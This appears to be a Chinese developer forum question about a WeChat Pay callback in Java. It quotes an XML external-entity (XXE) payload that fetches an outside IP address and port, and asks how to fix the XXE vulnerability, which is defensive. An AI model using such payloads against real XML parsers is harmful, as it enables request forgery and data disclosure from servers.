收藏
回答

微信支付回调问题?

java开发微信支付回调显示以下信息,网上说是xxe漏洞,微信支付服务器响应以下信息:

{msg:'微信支付结果回调信息:[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "http://101.91.62.170:4837/wx_xxe_dbc_os_2019121903_654?aHR0cDovL3d3dy56enNpbS5jb206MTAxNDAvcXJjb2RlL3BheU5vdGljZS5hc3B4">]><foo><value>&xxe;</value></foo>]'}

实际开发中是按照微信文档改正xml解析解决xxe漏洞,我想问该怎么解决这个问题



回答关注问题邀请回答
收藏

1 个回答

登录 后发表内容
问题标签